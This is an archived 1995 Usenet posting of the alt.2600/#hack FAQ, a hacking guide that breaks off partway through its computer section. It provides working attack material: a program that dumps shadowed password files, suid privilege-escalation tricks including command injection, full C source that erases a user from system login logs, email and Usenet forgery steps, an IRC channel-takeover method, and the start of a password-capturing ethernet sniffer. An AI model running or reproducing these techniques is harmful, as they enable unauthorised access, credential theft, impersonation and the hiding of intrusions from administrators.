home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz KrOnIcKLeZ 3 / HaCKeRz_KrOnIcKLeZ.iso / chibacity / alt_2600.wri < prev    next >
Internet Message Format  |  1996-04-23  |  172KB

  1. From will@gnu.ai.mit.edu Sun Mar 19 13:24:17 HST 1995
  2. Article: 21497 of alt.2600
  3. Path: news.lava.net!newsjunkie.ans.net!swiss.ans.net!potogold.rmii.com!rainbow.rmii.com!not-for-mail
  4. From: will@gnu.ai.mit.edu (Will Spencer)
  5. Newsgroups: alt.2600
  6. Subject: alt.2600 FAQ, Beta .011 - Part 1/1
  7. Followup-To: alt.2600
  8. Date: 19 Mar 1995 11:48:50 -0700
  9. Organization: Rocky Mountain Internet Inc.
  10. Lines: 5022
  11. Sender: will@rmii.com
  12. Message-ID: <3khuai$bq4@rainbow.rmii.com>
  13. Reply-To: will@gnu.ai.mit.edu (FAQ Comments address)
  14. NNTP-Posting-Host: rainbow.rmii.com
  15. Summary: This posting contains a list of Frequently Asked
  16.      Questions (and their answers) about hacking.  It
  17.      should be read by anyone who wishes to post to the
  18.      alt.2600 newsgroup or use the IRC channel #hack.
  19.  
  20. Archive-name: alt-2600-faq
  21. Posting-Frequency: Random
  22. Last-Modified: 1995/03/18
  23. Version: Beta .011
  24.  
  25.  
  26. Editors Note: Welcome to Beta .011 of the alt.2600/#hack FAQ!
  27.  
  28.                 The purpose of this FAQ is to give you a general
  29.                 introduction to the topics covered in alt.2600 and
  30.                 #hack.  No document will make you a hacker.
  31.  
  32.                 If you have a questions regarding any of the topics
  33.                 covered in the FAQ, please direct it to alt.2600 or
  34.                 #hack.  Please do not e-mail me with them, I'm getting
  35.                 swamped.
  36.  
  37.                 If your copy of the #hack FAQ does not end with the
  38.                 letters EOT on a line by themselves, you do not have
  39.                 the entire FAQ.
  40.  
  41.                 If you do not have the entire FAQ, retrieve if via ftp
  42.                 from one of these sites:
  43.  
  44.                         rahul.net       /pub/lps
  45.                         rtfm.mit.edu    /pub/usenet-by-group/alt.2600
  46.                         ftp.clark.net   /pub/jcase
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.                                     The
  55.  
  56.                             alt.2600/#Hack F.A.Q.
  57.  
  58.                              Beta Revision .011
  59.  
  60.                         A TNO Communication Production
  61.  
  62.                                     by
  63.                   Voyager
  64.                 will@gnu.ai.mit.edu
  65.  
  66.                 Sysop of
  67.                  Hacker's Haven
  68.                   (303)343-4053
  69.  
  70.                             Greets go out to:
  71.  
  72.           A-Flat, Al, Aleph1, Bluesman, Cavalier, Cruiser, C-Curve,
  73.           DeadKat, Disorder, Edison, Hobbit, KCrow, Major, Marauder,
  74.           Novocain, Outsider, Presence, Rogue Agent, sbin, Taran King,
  75.           Theora, ThePublic, Tomes and TheSaint.
  76.  
  77.  
  78.                We work in the dark
  79.                We do what we can
  80.                We give what we have
  81.                Our doubt is our passion,
  82.                and our passion is our task
  83.                The rest is the madness of art.
  84.  
  85.                 -- Henry James
  86.  
  87.  
  88.  
  89. Section A: Computers
  90.  
  91.   01. How do I access the password file under Unix?
  92.   02. How do I crack Unix passwords?
  93.   03. What is password shadowing?
  94.   04. Where can I find the password file if it's shadowed?
  95.   05. What is NIS/yp?
  96.   06. What are those weird characters after the comma in my passwd file?
  97.   07. How do I access the password file under VMS?
  98.   08. How do I crack VMS passwords?
  99.   09. How do I break out of a restricted shell?
  100.   10. How do I gain root from a suid script or program?
  101.   11. How do I erase my presence from the system logs?
  102.   12. How do I send fakemail?
  103.   13. How do I fake posts to UseNet?
  104.   14. How do I hack ChanOp on IRC?
  105.   15. How do I modify the IRC client to hide my real username?
  106.   16. How to I change to directories with strange characters in them?
  107.   17. What is ethernet sniffing?
  108.   18. What is an Internet Outdial?
  109. U 19. What are some Internet Outdials?
  110. U 20. What is this system?
  111. U 21. What are the default accounts for XXX ?
  112. U 22. What port is XXX on?
  113. U 23. What is a trojan/worm/virus/logic bomb?
  114. U 24. How can I protect myself from viruses and such?
  115. N 25. Where can I get more information about viruses?
  116.   26. What is Cryptoxxxxxxx?
  117.   27. What is PGP?
  118.   28. What is Tempest?
  119.   29. What is an anonymous remailer?
  120.   30. What are the addresses of some anonymous remailers?
  121.   31. How do I defeat copy protection?
  122.   32. What is 127.0.0.1?
  123. N 33. How do I post to a moderated newsgroup?
  124.  
  125.  
  126. Section B: Telephony
  127.  
  128.   01. What is a Red Box?
  129.   02. How do I build a Red Box?
  130. U 03. Where can I get a 6.5536Mhz crystal?
  131.   04. Which payphones will a Red Box work on?
  132.   05. How do I make local calls with a Red Box?
  133.   06. What is a Blue Box?
  134. U 07. Do Blue Boxes still work?
  135.   08. What is a Black Box?
  136. U 09. What do all the colored boxes do?
  137.   10. What is an ANAC number?
  138. U 11. What is the ANAC number for my area?
  139.   12. What is a ringback number?
  140. U 13. What is the ringback number for my area?
  141.   14. What is a loop?
  142. U 15. What is a loop in my area?
  143. U 16. What is a CNA number?
  144. U 17. What is the telephone company CNA number for my area?
  145. U 18. What are some numbers that always ring busy?
  146. U 19. What are some numbers that temporarily disconnect phone service?
  147. U 20. What is scanning?
  148.   21. Is scanning illegal?
  149.   22. Where can I purchase a lineman's handset?
  150.   23. What are the DTMF frequencies?
  151.   24. What are the frequencies of the telephone tones?
  152.   25. What are all of the * (LASS) codes?
  153.   26. What frequencies do cordless phones operate on?
  154. N 27. What is Caller-ID?
  155. N 28. What is a PBX?
  156. N 29. What is a VMB?
  157.  
  158.  
  159. Section C: Resources
  160.  
  161. U 01. What are some ftp sites of interest to hackers?
  162. N 02. What are some fsp sites of interest to hackers?
  163.   03. What are some newsgroups of interest to hackers?
  164. U 04. What are some telnet sites of interest to hackers?
  165.   05. What are some gopher sites of interest to hackers?
  166. U 06. What are some World wide Web (WWW) sites of interest to hackers?
  167. U 07. What are some IRC channels of interest to hackers?
  168. U 08. What are some BBS's of interest to hackers?
  169. U 09. What are some books of interest to hackers?
  170. N 10. What are some videos of interest to hackers?
  171. U 11. What are some mailing lists of interest to hackers?
  172.   12. What are some print magazines of interest to hackers?
  173. N 13. What are some e-zines of interest to hackers?
  174.   14. What are some organizations of interest to hackers?
  175. U 15. Where can I purchase a magnetic stripe encoder/decoder?
  176.   16. What are the rainbow books and how can I get them?
  177.  
  178.  
  179. Section D: 2600
  180.  
  181.   01. What is alt.2600?
  182.   02. What does "2600" mean?
  183.   03. Are there on-line versions of 2600 available?
  184.   04. I can't find 2600 at any bookstores.  What can I do?
  185.   05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  186.  
  187.  
  188. Section E: Miscellaneous
  189.  
  190. U 01. What does XXX stand for?
  191.   02. How do I determine if I have a valid credit card number?
  192.   03. What bank issued this credit card?
  193. U 04. What are the ethics of hacking?
  194.   05. Where can I get a copy of the alt.2600/#hack FAQ?
  195.  
  196.  
  197.  
  198. U == Updated since last release of the alt.2600/#hack FAQ
  199. N == New since last release of the alt.2600/#hack FAQ
  200.  
  201.  
  202.  
  203.  
  204. Section A: Computers
  205. ~~~~~~~~~~~~~~~~~~~~
  206.  
  207. 01. How do I access the password file under Unix?
  208.  
  209. In standard Unix the password file is /etc/passwd.  On a Unix system
  210. with either NIS/yp or password shadowing, much of the password data
  211. may be elsewhere.
  212.  
  213.  
  214. 02. How do I crack Unix passwords?
  215.  
  216. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  217. passwords are encrypted with a one way function.  The login program
  218. encrypts the text you enter at the "password:" prompt and compares
  219. that encrypted string against the encrypted form of your password.
  220.  
  221. Password cracking software uses wordlists.  Each word in the wordlist
  222. is encrypted and the results are compared to the encrypted form of the
  223. target password.
  224.  
  225. The best cracking program for Unix passwords is currently Crack by
  226. Alec Muffett.  For PC-DOS, the best package to use is currently
  227. CrackerJack.
  228.  
  229.  
  230. 03. What is password shadowing?
  231.  
  232. Password shadowing is a security system where the encrypted password
  233. field of /etc/passwd is replaced with a special token and the
  234. encrypted password is stored in a separate file which is not readable
  235. by normal system users.
  236.  
  237. To defeat password shadowing on many (but not all) systems, write a
  238. program that uses successive calls to getpwent() to obtain the
  239. password file.
  240.  
  241. Example:
  242.  
  243. #include <pwd.h>
  244. main()
  245. {
  246. struct passwd *p;
  247. while(p=getpwent())
  248. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  249. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  250. }
  251.  
  252.  
  253. 04. Where can I find the password file if it's shadowed?
  254.  
  255. Unix                  Path                            Token
  256. -----------------------------------------------------------------
  257. AIX 3                 /etc/security/passwd            !
  258.        or             /tcb/auth/files/<first letter   #
  259.                             of username>/<username>
  260. A/UX 3.0s             /tcb/files/auth/?/*
  261. BSD4.3-Reno           /etc/master.passwd              *
  262. ConvexOS 10           /etc/shadpw                     *
  263. ConvexOS 11           /etc/shadow                     *
  264. DG/UX                 /etc/tcb/aa/user/               *
  265. EP/IX                 /etc/shadow                     x
  266. HP-UX                 /.secure/etc/passwd             *
  267. IRIX 5                /etc/shadow                     x
  268. Linux 1.1             /etc/shadow                     *
  269. OSF/1                 /etc/passwd[.dir|.pag]          *
  270. SCO Unix #.2.x        /tcb/auth/files/<first letter   *
  271.                             of username>/<username>
  272. SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
  273. SunOS 5.0             /etc/shadow
  274.                       <optional NIS+ private secure maps/tables/whatever>
  275. System V Release 4.0  /etc/shadow                     x
  276. System V Release 4.2  /etc/security/* database
  277. Ultrix 4              /etc/auth[.dir|.pag]            *
  278. UNICOS                /etc/udb                        *
  279.  
  280.  
  281. 05. What is NIS/yp?
  282.  
  283. NIS (Network Information System) in the current name for what was once
  284. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  285. machines on a network to share configuration information, including
  286. password data.  NIS is not designed to promote system security.  If
  287. your system uses NIS you will have a very short /etc/passwd file that
  288. includes a line that looks like this:
  289.  
  290. +::0:0:::
  291.  
  292. To view the real password file use this command "ypcat passwd"
  293.  
  294.  
  295. 06. What are those weird characters after the comma in my passwd file?
  296.  
  297. The characters are password aging data.  Password aging forces the
  298. user to change passwords after a System Administrator specified period
  299. of time.  Password aging can also force a user to keep a password for
  300. a certain number of weeks before changing it.
  301.  
  302. ]
  303. ] Sample entry from /etc/passwd with password aging installed:
  304. ]
  305. ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
  306. ]
  307.  
  308. Note the comma in the encrypted password field.  The characters after
  309. the comma are used by the password aging mechanism.
  310.  
  311. ]
  312. ] Password aging characters from above example:
  313. ]
  314. ] M.z8
  315. ]
  316.  
  317. The four characters are interpreted as follows:
  318.  
  319.   1: Maximum number of weeks a password can be used without changing.
  320.   2: Minimum number of weeks a password must be used before changing.
  321. 3&4: Last time password was changed, in number of weeks since 1970.
  322.  
  323. Three special cases should be noted:
  324.  
  325. If the first and second characters are set to '..' the user will be
  326. forced to change his/her passwd the next time he/she logs in.  The
  327. passwd program will then remove the passwd aging characters, and the
  328. user will not be subjected to password aging requirements again.
  329.  
  330. If the third and fourth characters are set to '..' the user will be
  331. forced to change his/her passwd the next time he/she logs in. Password
  332. aging will then occur as defined by the first and second characters.
  333.  
  334. If the first character (MAX) is less than the second character (MIN),
  335. the user is not allowed to change his/her password.  Only root can
  336. change that users password.
  337.  
  338. It should also be noted that the su command does not check the password
  339. aging data.  An account with an expired password can be su'd to
  340. without being forced to change the password.
  341.  
  342.  
  343.                         Password Aging Codes
  344. +------------------------------------------------------------------------+
  345. |                                                                        |
  346. | Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
  347. |    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
  348. |                                                                        |
  349. | Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
  350. |    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
  351. |                                                                        |
  352. | Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
  353. |    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
  354. |                                                                        |
  355. | Character:  w  x  y  z                                                 |
  356. |    Number: 60 61 62 63                                                 |
  357. |                                                                        |
  358. +------------------------------------------------------------------------+
  359.  
  360.  
  361. 07. How do I access the password file under VMS?
  362.  
  363. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  364. unlike Unix, most users do not have access to read the password file.
  365.  
  366.  
  367. 08. How do I crack VMS passwords?
  368.  
  369. Write a program that uses the SYS$GETUAF functions to compare the
  370. results of encrypted words against the encrypted data in SYSUAF.DAT.
  371.  
  372. Two such programs are known to exist, CHECK_PASSWORD and
  373. GUESS_PASSWORD.
  374.  
  375.  
  376. 09. How do I break out of a restricted shell?
  377.  
  378. On poorly implemented restricted shells you can break out of the
  379. restricted environment by running a program that features a shell
  380. function.  A good example is vi.  Run vi and use this command:
  381.  
  382. :set shell=/bin/sh
  383.  
  384. then shell using this command:
  385.  
  386. :shell
  387.  
  388.  
  389. 10. How do I gain root from a suid script or program?
  390.  
  391. 1. Change IFS.
  392.  
  393. If the program calls any other programs using the system() function
  394. call, you may be able to fool it by changing IFS.  IFS is the Internal
  395. Field Separator that the shell uses to delimit arguments.
  396.  
  397. If the program contains a line that looks like this:
  398.  
  399. system("/bin/date")
  400.  
  401. and you change IFS to '/' the shell will them interpret the
  402. proceeding line as:
  403.  
  404. bin date
  405.  
  406. Now, if you have a program of your own in the path called "bin" the
  407. suid program will run your program instead of /bin/date.
  408.  
  409. To change IFS, use this command:
  410.  
  411. IFS='/';export IFS      # Bourne Shell
  412. setenv IFS '/'          # C Shell
  413. export IFS='/'          # Korn Shell
  414.  
  415.  
  416. 2. link the script to -i
  417.  
  418. Create a symbolic link named "-i" to the program.  Running "-i"
  419. will cause the interpreter shell (/bin/sh) to start up in interactive
  420. mode.  This only works on suid shell scripts.
  421.  
  422. Example:
  423.  
  424. % ln suid.sh -i
  425. % -i
  426. #
  427.  
  428.  
  429. 3. Exploit a race condition
  430.  
  431. Replace a symbolic link to the program with another program while the
  432. kernel is loading /bin/sh.
  433.  
  434. Example:
  435.  
  436. nice -19 suidprog ; ln -s evilprog suidroot
  437.  
  438.  
  439. 4. Send bad input to the program.
  440.  
  441. Invoke the name of the program and a separate command on the same
  442. command line.
  443.  
  444. Example:
  445.  
  446. suidprog ; id
  447.  
  448.  
  449. 11. How do I erase my presence from the system logs?
  450.  
  451. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  452. files that can be edited by hand with vi, you must use a program
  453. specifically written for this purpose.
  454.  
  455. Example:
  456.  
  457. #include <sys/types.h>
  458. #include <stdio.h>
  459. #include <unistd.h>
  460. #include <sys/file.h>
  461. #include <fcntl.h>
  462. #include <utmp.h>
  463. #include <pwd.h>
  464. #include <lastlog.h>
  465. #define WTMP_NAME "/usr/adm/wtmp"
  466. #define UTMP_NAME "/etc/utmp"
  467. #define LASTLOG_NAME "/usr/adm/lastlog"
  468.  
  469. int f;
  470.  
  471. void kill_utmp(who)
  472. char *who;
  473. {
  474.     struct utmp utmp_ent;
  475.  
  476.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  477.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  478.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  479.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  480.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  481.                  write (f, &utmp_ent, sizeof (utmp_ent));
  482.             }
  483.      close(f);
  484.   }
  485. }
  486.  
  487. void kill_wtmp(who)
  488. char *who;
  489. {
  490.     struct utmp utmp_ent;
  491.     long pos;
  492.  
  493.     pos = 1L;
  494.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  495.  
  496.      while(pos != -1L) {
  497.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  498.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  499.           pos = -1L;
  500.         } else {
  501.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  502.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  503.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  504.                write (f, &utmp_ent, sizeof (utmp_ent));
  505.                pos = -1L;
  506.           } else pos += 1L;
  507.         }
  508.      }
  509.      close(f);
  510.   }
  511. }
  512.  
  513. void kill_lastlog(who)
  514. char *who;
  515. {
  516.     struct passwd *pwd;
  517.     struct lastlog newll;
  518.  
  519.      if ((pwd=getpwnam(who))!=NULL) {
  520.  
  521.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  522.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  523.             bzero((char *)&newll,sizeof( newll ));
  524.             write(f, (char *)&newll, sizeof( newll ));
  525.             close(f);
  526.         }
  527.  
  528.     } else printf("%s: ?\n",who);
  529. }
  530.  
  531. main(argc,argv)
  532. int argc;
  533. char *argv[];
  534. {
  535.     if (argc==2) {
  536.         kill_lastlog(argv[1]);
  537.         kill_wtmp(argv[1]);
  538.         kill_utmp(argv[1]);
  539.         printf("Zap2!\n");
  540.     } else
  541.     printf("Error.\n");
  542. }
  543.  
  544.  
  545. 12. How do I send fakemail?
  546.  
  547. Telnet to port 25 of the machine you want the mail to appear to
  548. originate from.  Enter your message as in this example:
  549.  
  550.  HELO bellcore.com
  551.  MAIL FROM:Voyager@bellcore.com
  552.  RCPT TO:president@whitehouse.gov
  553.  DATA
  554.  
  555.     Please discontinue your silly Clipper initiative.
  556.  .
  557.  QUIT
  558.  
  559. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  560. line will not work.  Test by sending yourself fakemail first.
  561.  
  562. For more information read RFC 822 "Standard for the format of ARPA
  563. Internet text messages."
  564.  
  565.  
  566. 13. How do I fake posts to UseNet?
  567.  
  568. Use inews to post.  Give inews the following lines:
  569.  
  570.  From:
  571.  Newsgroups:
  572.  Subject:
  573.  Message-ID:
  574.  Date:
  575.  Organization:
  576.  
  577. For a moderated newsgroup, inews will also require this line:
  578.  
  579.  Approved:
  580.  
  581. Then add your post and terminate with <Control-D>.
  582.  
  583. Example:
  584.  
  585.  From: Eric S. Real
  586.  Newsgroups: alt.hackers
  587.  Subject: Pathetic bunch of wannabe losers
  588.  Message-ID: <esr.123@locke.ccil.org>
  589.  Date: Fri, 13 Aug 1994 12:15:03
  590.  Organization: Moral Majority
  591.  
  592.  A pathetic bunch of wannabe losers is what most of you are, with no
  593.  right to steal the honorable title of `hacker' to puff up your silly
  594.  adolescent egos. Get stuffed, get lost, and go to jail.
  595.  
  596.                                         Eric S. Real <esr@locke.ccil.org>
  597.  
  598.  
  599.  ^D
  600.  
  601. Note that many systems will append an Originator: line to your message
  602. header, effectively revealing the account from which the message was
  603. posted.
  604.  
  605.  
  606. 14. How do I hack ChanOp on IRC?
  607.  
  608. Find a server that is split from the rest of IRC and create your own
  609. channel there using the name of the channel you want ChanOp on.  When
  610. that server reconnects to the net, you will have ChanOp on the real
  611. channel.  If you have ServerOp on a server, you can cause it to split
  612. on purpose.
  613.  
  614.  
  615. 15. How do I modify the IRC client to hide my real username?
  616.  
  617. Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
  618. code files irc.c and ctcp.c.  The code you are looking for is fairly
  619. easy to spot.  Change it. Change the username code in irc.c and the
  620. ctcp information code in ctcp.c.  Compile and run your client.
  621.  
  622. Here are the diffs from a sample hack of the IRC client.  Your client
  623. code will vary slightly depending on what IRC client version you are
  624. running.
  625.  
  626. *** ctcp.c.old  Wed Feb 10 10:08:05 1993
  627. --- ctcp.c      Fri Feb 12 04:33:55 1993
  628. ***************
  629. *** 331,337 ****
  630.     struct  passwd  *pwd;
  631.     long    diff;
  632.     int     uid;
  633. !       char    c;
  634.   
  635.     /*
  636.      * sojge complained that ircII says 'idle 1 seconds'
  637. --- 331,337 ----
  638.     struct  passwd  *pwd;
  639.     long    diff;
  640.     int     uid;
  641. !       char    c, *fing;
  642.   
  643.     /*
  644.      * sojge complained that ircII says 'idle 1 seconds'
  645. ***************
  646. *** 348,354 ****
  647.     if (uid != DAEMON_UID)
  648.     {
  649.   #endif /* DAEMON_UID */       
  650. !               if (pwd = getpwuid(uid))
  651.         {
  652.             char    *tmp;
  653.   
  654. --- 348,356 ----
  655.     if (uid != DAEMON_UID)
  656.     {
  657.   #endif /* DAEMON_UID */       
  658. !               if (fing = getenv("IRCFINGER"))
  659. !                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
  660. !               else if (pwd = getpwuid(uid))
  661.         {
  662.             char    *tmp;
  663.   
  664. *** irc.c.old   Wed Feb 10 06:33:11 1993
  665. --- irc.c       Fri Feb 12 04:02:11 1993
  666. ***************
  667. *** 510,516 ****
  668.         malloc_strcpy(&my_path, "/");
  669.     if (*realname == null(char))
  670.         strmcpy(realname, "*Unknown*", REALNAME_LEN);
  671. !       if (*username == null(char))
  672.     {
  673.         if (ptr = getenv("USER"))
  674.             strmcpy(username, ptr, NAME_LEN);
  675. --- 510,518 ----
  676.         malloc_strcpy(&my_path, "/");
  677.     if (*realname == null(char))
  678.         strmcpy(realname, "*Unknown*", REALNAME_LEN);
  679. !       if (ptr = getenv("IRCUSER"))
  680. !               strmcpy(username, ptr, NAME_LEN);
  681. !       else if (*username == null(char))
  682.     {
  683.         if (ptr = getenv("USER"))
  684.             strmcpy(username, ptr, NAME_LEN);
  685.  
  686.  
  687. 16. How to I change to directories with strange characters in them?
  688.  
  689. These directories are often used by people trying to hide information,
  690. most often warez (commercial software).
  691.  
  692. There are several things you can do to determine what these strange
  693. characters are.  One is to use the arguments to the ls command that
  694. cause ls to give you more information:
  695.  
  696. >From  the man page for ls:
  697.  
  698.     -F   Causes directories to be marked with a trailing ``/'',
  699.      executable files to be marked with a trailing ``*'', and
  700.      symbolic links to be marked with a trailing ``@'' symbol.
  701.  
  702.     -q   Forces printing of non-graphic characters in filenames as the
  703.      character ``?''.
  704.  
  705.     -b   Forces printing of non-graphic characters in the \ddd
  706.      notation, in octal.
  707.  
  708. Perhaps the most useful tool is to simply do an "ls -al filename" to
  709. save the directory of the remote ftp site as a file on your local
  710. machine.  Then you can do a "cat -t -v -e filename" to see exactly
  711. what those bizarre little characters are.
  712.  
  713. >From  the man page for cat:
  714.  
  715.     -v  Causes non-printing characters (with the exception of tabs,
  716.     newlines, and form feeds) to be displayed.  Control characters
  717.     are displayed as ^X (<Ctrl>x), where X is the key pressed with
  718.     the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
  719.     <Del> character (octal 0177) is printed as ^?.  Non-ASCII
  720.     characters (with the high bit set) are printed as M -x, where
  721.     x is the character specified by the seven low order bits.
  722.  
  723.     -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
  724.     option is ignored if the -v option is not specified.
  725.  
  726.     -e  Causes a ``$'' character to be printed at the end of each line
  727.     (prior to the new-line).  This option is ignored if the -v
  728.     option is not set.
  729.  
  730. If the directory name includes a <SPACE> or a <TAB> you will need to
  731. enclose the entire directory name in quotes.  Example:
  732.  
  733. cd "..<TAB>"
  734.  
  735. On an IBM-PC, you may enter these special characters by holding down
  736. the <ALT> key and entering the decimal value of the special character
  737. on your numeric keypad.  When you release the <ALT> key, the special
  738. character should appear on your screen.  An ASCII chart can be very
  739. helpful.
  740.  
  741. Sometimes people will create directories with some of the standard
  742. stty control characters in them, such as ^Z (suspend) or ^C (intr).
  743. To get into those directories, you will first need to user stty to
  744. change the control character in qustion to another character.
  745.  
  746. >From  the man page for stty:
  747.  
  748.     Control assignments
  749.  
  750.     control-character C
  751.                       Sets control-character to C, where control-character is
  752.                       erase, kill, intr (interrupt), quit, eof, eol, swtch
  753.                       (switch), start, stop or susp.
  754.  
  755.                       start and stop are available as possible control char-
  756.                       acters for the control-character C assignment.
  757.  
  758.                       If C is preceded by a caret (^) (escaped from the
  759.                       shell), then the value used is the corresponding con-
  760.                       trol character (for example, ^D is a <Ctrl>d; ^? is
  761.                       interpreted as DELETE and ^- is interpreted as unde-
  762.                       fined).
  763.  
  764. Use the stty -a command to see your current stty settings, and to
  765. determine which one is causing you problems.
  766.  
  767.  
  768. 17. What is ethernet sniffing?
  769.  
  770. Ethernet sniffing is listening (with software) to the raw ethernet
  771. device for packets that interest you.  When your software sees a
  772. packet that fits certain criteria, it logs it to a file.  The most
  773. common criteria for an interesting packet is one that contains words
  774. like "login" or "password."
  775.  
  776. Many ethernet sniffers are available, here are a few that may be on
  777. your system now:
  778.  
  779. OS              Sniffer
  780. ~~              ~~~~~~~
  781. HP/UX           nettl (monitor) & netfmt (display)
  782.                 nfswatch        /* Available via anonymous ftp           */
  783. Irix            nfswatch        /* Available via anonymous ftp           */
  784.                 Etherman
  785. SunOS           etherfind
  786.                 nfswatch        /* Available via anonymous ftp           */
  787. Solaris         snoop
  788. DOS             ETHLOAD         /* Available via anonymous ftp as        */
  789.                                 /* ethld104.zip                          */
  790.                 The Gobbler     /* Available via anonymous ftp           */
  791.                 LanPatrol
  792.                 LanWatch
  793.         Netmon
  794.                 Netwatch
  795.                 Netzhack        /* Available via anonymous ftp at        */
  796.                                 /* mistress.informatik.unibw-muenchen.de */
  797.                                 /* /pub/netzhack.mac                     */
  798. Macintosh       Etherpeek
  799.  
  800. Here is source code for an ethernet sniffer:
  801.  
  802. /* Esniff.c */
  803.  
  804. #include <stdio.h>
  805. #include <ctype.h>
  806. #include <string.h>
  807.  
  808. #include <sys/time.h>
  809. #include <sys/file.h>
  810. #include <sys/stropts.h>
  811. #include <sys/signal.h>
  812. #include <sys/types.h>
  813. #include <sys/socket.h>
  814. #include <sys/ioctl.h>
  815.  
  816. #include <net/if.h>
  817. #include <net/nit_if.h>
  818. #include <net/nit_buf.h>
  819. #include <net/if_arp.h>
  820.  
  821. #include <netinet/in.h>
  822. #include <netinet/if_ether.h>
  823. #include <netinet/in_systm.h>
  824. #include <netinet/ip.h>
  825. #include <netinet/udp.h>
  826. #include <netinet/ip_var.h>
  827. #include <netinet/udp_var.h>
  828. #include <netinet/in_systm.h>
  829. #include <netinet/tcp.h>
  830. #include <netinet/ip_icmp.h>
  831.  
  832. #include <netdb.h>
  833. #include <arpa/inet.h>
  834.  
  835. #define ERR stderr
  836.  
  837. char    *malloc();
  838. char    *device,
  839.         *ProgName,
  840.         *LogName;
  841. FILE    *LOG;
  842. int     debug=0;
  843.  
  844. #define NIT_DEV     "/dev/nit"
  845. #define CHUNKSIZE   4096        /* device buffer size */
  846. int     if_fd = -1;
  847. int     Packet[CHUNKSIZE+32];
  848.  
  849. void Pexit(err,msg)
  850. int err; char *msg;
  851. { perror(msg);
  852.   exit(err); }
  853.  
  854. void Zexit(err,msg)
  855. int err; char *msg;
  856. { fprintf(ERR,msg);
  857.   exit(err); }
  858.  
  859. #define IP          ((struct ip *)Packet)
  860. #define IP_OFFSET   (0x1FFF)
  861. #define SZETH       (sizeof(struct ether_header))
  862. #define IPLEN       (ntohs(ip->ip_len))
  863. #define IPHLEN      (ip->ip_hl)
  864. #define TCPOFF      (tcph->th_off)
  865. #define IPS         (ip->ip_src)
  866. #define IPD         (ip->ip_dst)
  867. #define TCPS        (tcph->th_sport)
  868. #define TCPD        (tcph->th_dport)
  869. #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
  870.  
  871. #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
  872.  
  873. #define MAXBUFLEN  (128)
  874. time_t  LastTIME = 0;
  875.  
  876. struct CREC {
  877.      struct CREC *Next,
  878.                  *Last;
  879.      time_t  Time;              /* start time */
  880.      struct in_addr SRCip,
  881.                     DSTip;
  882.      u_int   SRCport,           /* src/dst ports */
  883.              DSTport;
  884.      u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
  885.      u_int   Length;            /* current data length */
  886.      u_int   PKcnt;             /* # pkts */
  887.      u_long  LASTseq;
  888. };
  889.  
  890. struct CREC *CLroot = NULL;
  891.  
  892. char *Symaddr(ip)
  893. register struct in_addr ip;
  894. { register struct hostent *he =
  895.       gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
  896.  
  897.   return( (he)?(he->h_name):(inet_ntoa(ip)) );
  898. }
  899.  
  900. char *TCPflags(flgs)
  901. register u_char flgs;
  902. { static char iobuf[8];
  903. #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
  904.  
  905.   SFL(0,TH_FIN, 'F');
  906.   SFL(1,TH_SYN, 'S');
  907.   SFL(2,TH_RST, 'R');
  908.   SFL(3,TH_PUSH,'P');
  909.   SFL(4,TH_ACK, 'A');
  910.   SFL(5,TH_URG, 'U');
  911.   iobuf[6]=0;
  912.   return(iobuf);
  913. }
  914.  
  915. char *SERVp(port)
  916. register u_int port;
  917. { static char buf[10];
  918.   register char *p;
  919.  
  920.    switch(port) {
  921.      case IPPORT_LOGINSERVER: p="rlogin"; break;
  922.      case IPPORT_TELNET:      p="telnet"; break;
  923.      case IPPORT_SMTP:        p="smtp"; break;
  924.      case IPPORT_FTP:         p="ftp"; break;
  925.      default: sprintf(buf,"%u",port); p=buf; break;
  926.    }
  927.    return(p);
  928. }
  929.  
  930. char *Ptm(t)
  931. register time_t *t;
  932. { register char *p = ctime(t);
  933.   p[strlen(p)-6]=0; /* strip " YYYY\n" */
  934.   return(p);
  935. }
  936.  
  937. char *NOWtm()
  938. { time_t tm;
  939.   time(&tm);
  940.   return( Ptm(&tm) );
  941. }
  942.  
  943. #define MAX(a,b) (((a)>(b))?(a):(b))
